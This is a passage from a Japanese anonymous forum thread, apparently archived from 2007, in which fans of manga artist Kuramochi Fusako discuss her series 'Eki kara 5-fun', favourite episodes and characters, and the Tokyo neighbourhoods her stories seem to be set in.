天然コケコッコー!

150 :花と名無しさん:2007/11/26(月) 08:48:33 ID:???O
ローラの話長くなりそうだよね。
相手の円城さんがチープスリルのウメちゃんみたいに影の主役っぽく見えるし。
休載中とはいえコーラス本誌でもまだ続いてるし。
でもローラと円城さん好きだから嬉しい。

151 :花と名無しさん:2007/11/26(月) 17:08:54 ID:???O
やっと駅5買って読んだけど面白かったぁ!
ベテランなのに全く劣化してないとこが凄い。
私は結構ep4も好き。面白い。

152 :花と名無しさん:2007/11/26(月) 20:51:53 ID:???O
私も第四話好きだ。ちょっと読みにくかったけど新鮮な感じしたな。

153 :花と名無しさん:2007/11/27(火) 02:06:54 ID:???0
むしろ4話が一番好きだ。赤松とイリヤが(・∀・)イイ!!
こんな話を描けるくらもちさんって凄すぎる。
上沼恵美子と同い年だというのにw


154 :花と名無しさん:2007/11/27(火) 07:29:47 ID:???0
前にもあんな感じの読みきりがあったよね。
くらもちさんはネットやってそう。最後orzってたしw

>>153ムダ知識をありがとうw<上沼恵美子と同い年

155 :花と名無しさん:2007/11/27(火) 19:25:20 ID:???0
聖さんのコミックスに「ふーちゃんはパソコンの達人」とか書かれてて
オークションのやり方もくらもちさんに教わったって書かれてた。

聖さんのファンサイトがネットになる事も教えてくれた、って書いてあったから
結構詳しいみたいだね

156 :花と名無しさん:2007/11/27(火) 19:52:26 ID:???O
ふーちゃんじゃなくてぷーちゃんじゃないかな
細かいところすまんけど

157 :花と名無しさん:2007/11/27(火) 20:50:59 ID:???O
しかし赤松は魅力ないな。なんつーか女の子として。けどそれが良かった。あんなヒロイン描けるのが面白い。

158 :花と名無しさん:2007/11/28(水) 01:12:08 ID:???O
藤巻弟かわええ

159 :花と名無しさん:2007/11/28(水) 07:10:30 ID:???0
そうだね。
今月は整った顔ばかりなのに、来月号の予告にアホ面した子が載ってる。

160 :花と名無しさん:2007/11/28(水) 14:33:37 ID:???0
駅から5分読んだ
今時は50代でもネットに詳しいものなのか。
不思議な気分だ

161 :花と名無しさん:2007/11/28(水) 20:39:29 ID:???O
まあくん可愛かったね。今回いつもより絵がていねいな気がした。よっちゃん可愛くなってる。

162 :花と名無しさん:2007/11/29(木) 19:56:02 ID:???0
駅から5分を読むと、くらもちふさこと自分は
生活圏が同じのような気がしてきた。
登場人物の苗字とか、住宅地のマンション群の絵と
そっくりなのとか周りにあるので。
勝手な思い込みかもしれないけど、ご近所さんだといいなぁ。

163 :花と名無しさん:2007/11/30(金) 09:50:05 ID:???0
いやいやいや、漫画の舞台と作者の生活圏とは別物でせう。

164 :花と名無しさん:2007/12/02(日) 02:41:56 ID:???0
駅から5分はおそらく駒込近辺だよね。
Kiss+πr2でも上中里、巣鴨、西ヶ原近辺、
海の天辺は池袋、
後、百年の恋も覚めてしまうは霜降銀座や染井銀座近辺が舞台になってたよねよね。
リアルタイムで読んでた学生時代に住んでた町、通った町が舞台になってたんで何か嬉しかったよ。
結構地味目の街を舞台にしてるんで、子供の頃にでも住んでたのかもと自分も思ってたけれどね。

165 :花と名無しさん:2007/12/02(日) 07:06:04 ID:???O
東京のカサノバは世田谷だったっけ。アンコールが3回でも仕事後に食事する場所を用賀辺りで探していた覚えが。いろはにこんぺいとはどこだったかなあ。達が引っ越すのは世田谷だったけど。

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)